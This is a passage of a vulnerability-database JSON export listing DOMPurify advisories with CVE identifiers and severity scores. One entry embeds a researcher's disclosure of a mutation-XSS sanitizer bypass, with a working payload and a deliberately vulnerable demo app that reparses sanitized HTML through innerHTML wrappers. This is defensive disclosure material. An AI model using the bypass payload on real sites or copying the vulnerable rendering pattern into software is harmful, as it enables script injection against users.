rify-bypass-using-mxss/"},{"reference_url":"https://www.npmjs.com/advisories/1205","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:
R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.npmjs.com/advisories/1205"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-16728","reference_id":"CVE-2019-16728","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-16728"},{"reference_url":"https://github.com/advisories/GHSA-chqj-j4fh-rw7m","reference_id":"GHSA-chqj-j4fh-rw7m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-chqj-j4fh-rw7m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/447288?format=json","purl":"pkg:npm/dompurify@2.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-56ww-dvtp-8uc2"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-gzpp-fw72-57hu"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-nz3k-udjb-3fhz"},{"vulnerability":"VCID-wmjr-1h3n-hbhb"},{"vulnerability":"VCID-z8n7-dz6p-zqfb"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.1"},{"url":"http://public2.vulnerablecode.io/api/packages/16899?format=json","purl":"pkg:npm/dompurify@2.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-56ww-dvtp-8uc2"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-gzpp-fw72-57hu"},{"vulnerability":"VCID-jnpe-
6ax6-zubr"},{"vulnerability":"VCID-nz3k-udjb-3fhz"},{"vulnerability":"VCID-wmjr-1h3n-hbhb"},{"vulnerability":"VCID-z8n7-dz6p-zqfb"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.3"}],"aliases":["CVE-2019-16728","GHSA-chqj-j4fh-rw7m"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gbb5-2vbk-suh8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/326566?format=json","vulnerability_id":"VCID-gzpp-fw72-57hu","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-26870","reference_id":"","reference_type":"","scores":[{"value":"0.00417","scoring_system":"epss","scoring_elements":"0.62284","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00417","scoring_system":"epss","scoring_elements":"0.62176","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00417","scoring_system":"epss","scoring_elements":"0.62289","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00417","scoring_system":"epss","scoring_elements":"0.62278","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-26870"},{"reference_url":"https://github.com/cure53/DOMPurify/commit/02724b8eb048dd219d6725b05c3000936f11d62d","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/cure53/DOMPurify/commit/02724b8eb048dd219d6725b05c3000936f11d62d"},{"reference_url":"https://github.com/cure53/DOMPurify/compare/2.0.16...2.0.17","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"http
s://github.com/cure53/DOMPurify/compare/2.0.16...2.0.17"},{"reference_url":"https://lists.debian.org/debian-lts-announce/2020/10/msg00029.html","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.debian.org/debian-lts-announce/2020/10/msg00029.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26870","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26870"},{"reference_url":"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-26870","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-26870"},{"reference_url":"https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass"},{"reference_url":"https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/","reference_id":"","reference_type":"","scores":[],"url":"https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/"},{"reference_url":"https://snyk.io/vuln/SNYK-JS-DOMPURIFY
-1016634","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://snyk.io/vuln/SNYK-JS-DOMPURIFY-1016634"},{"reference_url":"https://github.com/advisories/GHSA-63q7-h895-m982","reference_id":"GHSA-63q7-h895-m982","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-63q7-h895-m982"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/382121?format=json","purl":"pkg:npm/dompurify@2.0.17","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-56ww-dvtp-8uc2"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-wmjr-1h3n-hbhb"},{"vulnerability":"VCID-z8n7-dz6p-zqfb"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.17"}],"aliases":["CVE-2020-26870","GHSA-63q7-h895-m982"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gzpp-fw72-57hu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360058?format=json","vulnerability_id":"VCID-jnpe-6ax6-zubr","summary":"DOMPurify is vulnerable to mutation-XSS via Re-Contextualization\n## Description\n\nA mutation-XSS (mXSS) condition was confirmed when sanitized HTML is reinserted into a new parsing context using `innerHTML` and special wrappers. The vulnerable wrappers confirmed in browser behavior are `script`, `xmp`, `iframe`, `noembed`, `noframes`, and `noscript`. 
The payload remains seemingly benign after `DOMPurify.sanitize()`, but mutates during the second parse into executable markup with an event handler, enabling JavaScript execution in the client (`alert(1)` in the PoC).\n\n\n## Vulnerability\n\nThe root cause is context switching after sanitization: sanitized output is treated as trusted and concatenated into a wrapper string (for example, `<xmp> ... </xmp>` or other special wrappers) before being reparsed by the browser. In this flow, attacker-controlled text inside an attribute (for example `</xmp>` or equivalent closing sequences for each wrapper) closes the special parsing context early and reintroduces attacker markup (`<img ... onerror=...>`) outside the original attribute context. DOMPurify sanitizes the original parse tree, but the application performs a second parse in a different context, reactivating dangerous tokens (classic mXSS pattern).\n\n## PoC\n\n1. Start the PoC app:\n```bash\nnpm install\nnpm start\n```\n\n2. Open `http://localhost:3001`.\n3. Set `Wrapper en sink` to `xmp`.\n4. Use payload:\n```html\n <img src=x alt=\"</xmp><img src=x onerror=alert('expoc')>\">\n```\n\n5. Click `Sanitize + Render`.\n6. Observe:\n- `Sanitized response` still contains the `</xmp>` sequence inside `alt`.\n- The sink reparses to include `<img src=\"x\" onerror=\"alert('expoc')\">`.\n- `alert('expoc')` is triggered.\n7. 
Files:\n- index.html\n\n```html\n<!doctype html>\n<html lang=\"en\">\n  <head>\n    <meta charset=\"utf-8\">\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n    <title>expoc - DOMPurify SSR PoC</title>\n    <style>\n      :root {\n        --bg: #f7f8fb;\n        --panel: #ffffff;\n        --line: #d8dce6;\n        --text: #0f172a;\n        --muted: #475569;\n        --accent: #0ea5e9;\n      }\n\n      * {\n        box-sizing: border-box;\n      }\n\n      body {\n        margin: 0;\n        font-family: \"SF Mono\", Menlo, Consolas, monospace;\n        color: var(--text);\n        background: radial-gradient(circle at 10% 0%, #e0f2fe 0%, var(--bg) 60%);\n      }\n\n      main {\n        max-width: 980px;\n        margin: 28px auto;\n        padding: 0 16px 20px;\n      }\n\n      h1 {\n        margin: 0 0 10px;\n        font-size: 1.45rem;\n      }\n\n      p {\n        margin: 0;\n        color: var(--muted);\n      }\n\n      .grid {\n        display: grid;\n        gap: 14px;\n        margin-top: 16px;\n      }\n\n      .card {\n        background: var(--panel);\n        border: 1px solid var(--line);\n        border-radius: 12px;\n        padding: 14px;\n      }\n\n      label {\n        display: block;\n        margin-bottom: 7px;\n        font-size: 0.85rem;\n        color: var(--muted);\n      }\n\n      textarea,\n      input,\n      select,\n      button {\n        width: 100%;\n        border: 1px solid var(--line);\n        border-radius: 8px;\n        padding: 9px 10px;\n        font: inherit;\n        background: #fff;\n      }\n\n      textarea {\n        min-height: 110px;\n        resize: vertical;\n      }\n\n      .row {\n        display: grid;\n        grid-template-columns: 1fr 230px;\n        gap: 12px;\n      }\n\n      button {\n        cursor: pointer;\n        background: var(--accent);\n        color: #fff;\n        border-color: #0284c7;\n      }\n\n      #sink {\n        min-height: 90px;\n        border: 
1px dashed #94a3b8;\n        border-radius: 8px;\n        padding: 10px;\n        background: #f8fafc;\n      }\n\n      pre {\n        margin: 0;\n        white-space: pre-wrap;\n        word-break: break-word;\n      }\n\n      .note {\n        margin-top: 8px;\n        font-size: 0.85rem;\n      }\n\n      .status-grid {\n        display: grid;\n        grid-template-columns: repeat(auto-fit, minmax(180px, 1fr));\n        gap: 8px;\n        margin-top: 10px;\n      }\n\n      .status-item {\n        border: 1px solid var(--line);\n        border-radius: 8px;\n        padding: 8px 10px;\n        font-size: 0.85rem;\n        background: #fff;\n      }\n\n      .status-item.vuln {\n        border-color: #ef4444;\n        background: #fef2f2;\n      }\n\n      .status-item.safe {\n        border-color: #22c55e;\n        background: #f0fdf4;\n      }\n\n      @media (max-width: 760px) {\n        .row {\n          grid-template-columns: 1fr;\n        }\n      }\n    </style>\n  </head>\n  <body>\n    <main>\n      <h1>expoc - DOMPurify Server-Side PoC</h1>\n      <p>\n        Flujo: input -> POST /sanitize (Node + jsdom + DOMPurify) -> render vulnerable con innerHTML.\n      </p>\n\n      <div class=\"grid\">\n        <section class=\"card\">\n          <label for=\"payload\">Payload</label>\n          <textarea id=\"payload\"><img src=x alt=\"</script><img src=x onerror=alert('expoc')>\"></textarea>\n          <div class=\"row\" style=\"margin-top: 10px;\">\n            <div>\n              <label for=\"wrapper\">Wrapper en sink</label>\n              <select id=\"wrapper\">\n                <option value=\"div\">div</option>\n                <option value=\"textarea\">textarea</option>\n                <option value=\"title\">title</option>\n                <option value=\"style\">style</option>\n                <option value=\"script\" selected>script</option>\n                <option value=\"xmp\">xmp</option>\n                <option 
value=\"iframe\">iframe</option>\n                <option value=\"noembed\">noembed</option>\n                <option value=\"noframes\">noframes</option>\n                <option value=\"noscript\">noscript</option>\n              </select>\n            </div>\n            <div style=\"display:flex;align-items:end;\">\n              <button id=\"run\" type=\"button\">Sanitize + Render</button>\n            </div>\n          </div>\n          <p class=\"note\">Se usa render vulnerable: <code>sink.innerHTML = '&lt;wrapper&gt;' + sanitized + '&lt;/wrapper&gt;'</code>.</p>\n          <div class=\"status-grid\">\n            <div class=\"status-item vuln\">script (vulnerable)</div>\n            <div class=\"status-item vuln\">xmp (vulnerable)</div>\n            <div class=\"status-item vuln\">iframe (vulnerable)</div>\n            <div class=\"status-item vuln\">noembed (vulnerable)</div>\n            <div class=\"status-item vuln\">noframes (vulnerable)</div>\n            <div class=\"status-item vuln\">noscript (vulnerable)</div>\n            <div class=\"status-item safe\">div (no vulnerable)</div>\n            <div class=\"status-item safe\">textarea (no vulnerable)</div>\n            <div class=\"status-item safe\">title (no vulnerable)</div>\n            <div class=\"status-item safe\">style (no vulnerable)</div>\n          </div>\n        </section>\n\n        <section class=\"card\">\n          <label>Sanitized response</label>\n          <pre id=\"sanitized\">(empty)</pre>\n        </section>\n\n        <section class=\"card\">\n          <label>Sink</label>\n          <div id=\"sink\"></div>\n        </section>\n      </div>\n    </main>\n\n    <script>\n      const payload = document.getElementById('payload');\n      const wrapper = document.getElementById('wrapper');\n      const run = document.getElementById('run');\n      const sanitizedNode = document.getElementById('sanitized');\n      const sink = document.getElementById('sink');\n\n      
run.addEventListener('click', async () => {\n        const response = await fetch('/sanitize', {\n          method: 'POST',\n          headers: { 'Content-Type': 'application/json' },\n          body: JSON.stringify({ input: payload.value })\n        });\n\n        const data = await response.json();\n        const sanitized = data.sanitized || '';\n        const w = wrapper.value;\n\n        sanitizedNode.textContent = sanitized;\n        sink.innerHTML = '<' + w + '>' + sanitized + '</' + w + '>';\n      });\n    </script>\n  </body>\n</html>\n```\n\n- server.js\n\n```js\nconst express = require('express');\nconst path = require('path');\nconst { JSDOM } = require('jsdom');\nconst createDOMPurify = require('dompurify');\n\nconst app = express();\nconst port = process.env.PORT || 3001;\n\nconst window = new JSDOM('').window;\nconst DOMPurify = createDOMPurify(window);\n\napp.use(express.json());\napp.use(express.static(path.join(__dirname, 'public')));\n\napp.get('/health', (_req, res) => {\n  res.json({ ok: true, service: 'expoc' });\n});\n\napp.post('/sanitize', (req, res) => {\n  const input = typeof req.body?.input === 'string' ? 
req.body.input : '';\n  const sanitized = DOMPurify.sanitize(input);\n  res.json({ sanitized });\n});\n\napp.listen(port, () => {\n  console.log(`expoc running at http://localhost:${port}`);\n});\n```\n\n- package.json\n\n```json\n{\n  \"name\": \"expoc\",\n  \"version\": \"1.0.0\",\n  \"main\": \"server.js\",\n  \"scripts\": {\n    \"test\": \"echo \\\"Error: no test specified\\\" && exit 1\",\n    \"start\": \"node server.js\",\n    \"dev\": \"node server.js\"\n  },\n  \"keywords\": [],\n  \"author\": \"\",\n  \"license\": \"ISC\",\n  \"description\": \"\",\n  \"dependencies\": {\n    \"dompurify\": \"^3.3.1\",\n    \"express\": \"^5.2.1\",\n    \"jsdom\": \"^28.1.0\"\n  }\n}\n```\n\n## Evidence\n\n- PoC\n\n[daft-video.webm](https://github.com/user-attachments/assets/499a593d-0241-4ab8-95a9-cf49a00bda90)\n\n- XSS triggered\n<img width=\"2746\" height=\"1588\" alt=\"daft-img\" src=\"https://github.com/user-attachments/assets/1f463c14-d5a3-4c93-94e4-12d2d02c7d15\" />\n\n## Why This Happens\nThis is a mutation-XSS pattern caused by a parse-context mismatch:\n\n- Parse 1 (sanitization phase): input is interpreted under normal HTML parsing rules.\n- Parse 2 (sink phase): sanitized output is embedded into a wrapper that changes parser state (`xmp` raw-text behavior).\n- Attacker-controlled sequence (`</xmp>`) gains structural meaning in parse 2 and alters DOM structure.\n\nSanitization is not a universal guarantee across all future parsing contexts. The sink design reintroduces risk.\n\n## Remediation Guidance\n1. Do not concatenate sanitized strings into new HTML wrappers followed by `innerHTML`.\n2. Keep the rendering context stable from sanitize to sink.\n3. Prefer DOM-safe APIs (`textContent`, `createElement`, `setAttribute`) over string-based HTML composition.\n4. If HTML insertion is required, sanitize as close as possible to final insertion context and avoid wrapper constructs with raw-text semantics (`xmp`, `script`, etc.).\n5. 
Add regression tests for context-switch/mXSS payloads (including `</xmp>`, `</noscript>`, similar parser-breakout markers).\n\nReported by Oscar Uribe, Security Researcher at Fluid Attacks. Camilo Vera and Cristian Vargas from the Fluid Attacks Research Team have identified a mXSS via Re-Contextualization in DomPurify 3.3.1.\n\nFollowing Fluid Attacks [Disclosure Policy](https://fluidattacks.com/advisories/policy), if this report corresponds to a vulnerability and the conditions outlined in the policy are met, this advisory will be published on the website over the next few days (the timeline may vary depending on maintainers' willingness to attend to and respond to this report) at the following URL: https://fluidattacks.com/advisories/daft\n\nAcknowledgements: [Camilo Vera](https://github.com/caverav/) and [Cristian Vargas](https://github.com/tachote).","references":[{"reference_url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-h8r8-wccr-v5f2","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-h8r8-wccr-v5f2"},{"reference_url":"https://github.com/advisories/GHSA-h8r8-wccr-v5f2","reference_id":"GHSA-h8r8-wccr-v5f2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h8r8-wccr-v5f2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/40110?format=json","purl":"pkg:npm/dompurify@3.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-8d4n-d1dh-4fe9"},{"vulnerability":"VCID-cmrb-k5pw-vffn"}],"re
source_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.3.2"}],"aliases":["GHSA-h8r8-wccr-v5f2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jnpe-6ax6-zubr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/205923?format=json","vulnerability_id":"VCID-nz3k-udjb-3fhz","summary":"Cross-Site Scripting in dompurify","references":[{"reference_url":"https://github.com/cure53/DOMPurify/releases/tag/2.0.7","reference_id":"","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/cure53/DOMPurify/releases/tag/2.0.7"},{"reference_url":"https://www.npmjs.com/advisories/1223","reference_id":"","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.npmjs.com/advisories/1223"},{"reference_url":"https://github.com/advisories/GHSA-mjjq-c88q-qhr6","reference_id":"GHSA-mjjq-c88q-qhr6","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mjjq-c88q-qhr6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/17520?format=json","purl":"pkg:npm/dompurify@2.0.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-56ww-dvtp-8uc2"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-gzpp-fw72-57hu"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-wmjr-1h3n-hbhb"},{"vulnerability":"VCID-z8n7-dz6p-zqfb"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.7"}],"aliases":["GHSA-mjjq-c88q-qhr6","GMS-2020-711"],"risk_score":4.5,"exploitabilit
y":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nz3k-udjb-3fhz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56525?format=json","vulnerability_id":"VCID-wmjr-1h3n-hbhb","summary":"DOMPurify is a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify was vulnerable to prototype pollution. This vulnerability is fixed in 2.4.2.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-48910.json","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-48910.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-48910","reference_id":"","reference_type":"","scores":[{"value":"0.02592","scoring_system":"epss","scoring_elements":"0.85978","published_at":"2026-06-13T12:55:00Z"},{"value":"0.02592","scoring_system":"epss","scoring_elements":"0.85971","published_at":"2026-06-14T12:55:00Z"},{"value":"0.02592","scoring_system":"epss","scoring_elements":"0.85968","published_at":"2026-06-12T12:55:00Z"},{"value":"0.02592","scoring_system":"epss","scoring_elements":"0.85919","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-48910"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48910","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48910"},{"reference_url":"https://lists.debian.org/debian-lts-announce/2025/02/msg00010.html","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"CRITICAL
","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.debian.org/debian-lts-announce/2025/02/msg00010.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-48910","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-48910"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2322949","reference_id":"2322949","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2322949"},{"reference_url":"https://github.com/cure53/DOMPurify/commit/d1dd0374caef2b4c56c3bd09fe1988c3479166dc","reference_id":"d1dd0374caef2b4c56c3bd09fe1988c3479166dc","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-10-31T15:52:58Z/"}],"url":"https://github.com/cure53/DOMPurify/commit/d1dd0374caef2b4c56c3bd09fe1988c3479166dc"},{"reference_url":"https://github.com/advisories/GHSA-p3vf-v8qc-cwcr","reference_id":"GHSA-p3vf-v8qc-cwcr","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p3vf-v8qc-cwcr"},{"reference_url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-p3vf-v8qc-cwcr","reference_id":"GHSA-p3vf-v8qc-cwcr","reference_type":"","scores":[{"value":"9.1","scoring_system":"c
vssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-10-31T15:52:58Z/"}],"url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-p3vf-v8qc-cwcr"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:10186","reference_id":"RHSA-2024:10186","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:10186"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:9583","reference_id":"RHSA-2024:9583","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:9583"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:9620","reference_id":"RHSA-2024:9620","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:9620"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:0079","reference_id":"RHSA-2025:0079","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:0079"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:0082","reference_id":"RHSA-2025:0082","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:0082"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:0654","reference_id":"RHSA-2025:0654","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:0654"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:0875","reference_id":"RHSA-2025:0875","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:0875"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:18233","reference_id":"RHSA-2025:18233","reference_type":""
,"scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:18233"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19003","reference_id":"RHSA-2025:19003","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19003"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19017","reference_id":"RHSA-2025:19017","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19017"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19047","reference_id":"RHSA-2025:19047","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19047"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19058","reference_id":"RHSA-2025:19058","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19058"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19306","reference_id":"RHSA-2025:19306","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19306"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19314","reference_id":"RHSA-2025:19314","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19314"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19895","reference_id":"RHSA-2025:19895","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19895"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:22284","reference_id":"RHSA-2025:22284","reference_type":"","s